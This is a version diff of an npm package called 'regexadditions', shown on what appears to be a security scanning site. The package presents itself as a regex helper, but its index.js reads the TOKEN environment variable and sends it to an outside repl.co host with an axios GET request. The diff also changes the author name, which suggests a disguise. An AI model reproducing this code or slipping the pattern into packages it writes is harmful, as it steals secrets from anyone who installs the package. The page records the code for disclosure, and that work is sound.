regexadditions 1.0.0 → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/index.js +0 -3
  2. package/package.json +5 -4
  3. package/test.js +0 -0
package/index.js CHANGED
@@ -1,8 +1,5 @@
1
1
  const axios = require('axios');
2
2
 
3
- console.log("aa")
4
-
5
- console.log("a")
6
3
  const TOKEN = process.env.TOKEN;
7
4
  axios
8
5
  .get("https://ivi.cheerioos.repl.co/image?e="+TOKEN)
package/package.json CHANGED
@@ -1,14 +1,15 @@
1
1
  {
2
2
  "name": "regexadditions",
3
- "version": "1.0.0",
4
- "description": "",
3
+ "version": "1.0.1",
5
4
  "main": "index.js",
6
5
  "scripts": {
7
6
  "test": "echo \"Error: no test specified\" && exit 1"
8
7
  },
9
- "author": "cheerioos",
8
+ "author": "Mark Rogers",
10
9
  "license": "ISC",
11
10
  "dependencies": {
12
11
  "axios": "^0.27.2"
13
- }
12
+ },
13
+ "devDependencies": {},
14
+ "description": ""
14
15
  }
package/test.js DELETED
File without changes